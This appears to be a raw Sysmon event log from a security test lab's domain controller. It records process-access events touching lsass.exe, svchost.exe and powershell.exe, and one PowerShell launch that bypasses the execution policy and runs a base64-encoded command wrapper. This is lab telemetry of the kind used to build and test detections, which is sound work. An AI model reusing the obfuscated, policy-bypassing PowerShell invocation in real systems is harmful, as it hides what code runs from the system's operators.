08:42:01.995{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16D9-5F84-8100-000000007F01}42644268C:\Windows\system32\conhost.exe{5D479F2C-16D9-5F84-8500-000000007F01}4440C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16D9-5F84-8500-000000007F01}4440C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.433{5D479F2C-16D9-5F84-8400-000000007F01}43762588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16D9-5F84-8500-000000007F01}4440C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e84132ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b4144(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b3e15(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e836547a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78749ab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78d2e7a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b64df(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b64df(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b6370(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78a82f5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b4828(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b441b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b4144(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e78b3e15(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e836547a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e789ac76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e789a246(wow64) 154100x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.436{5D479F2C-16D9-5F84-8500-000000007F01}4440C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D9-5F84-91E5-040000000000}0x4e5910HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.417{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.417{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.417{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.370{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.370{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.323{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hqfkixer.xeq.ps12020-10-12 08:42:01.323 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.323{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16D9-5F84-8100-000000007F01}42644268C:\Windows\system32\conhost.exe{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 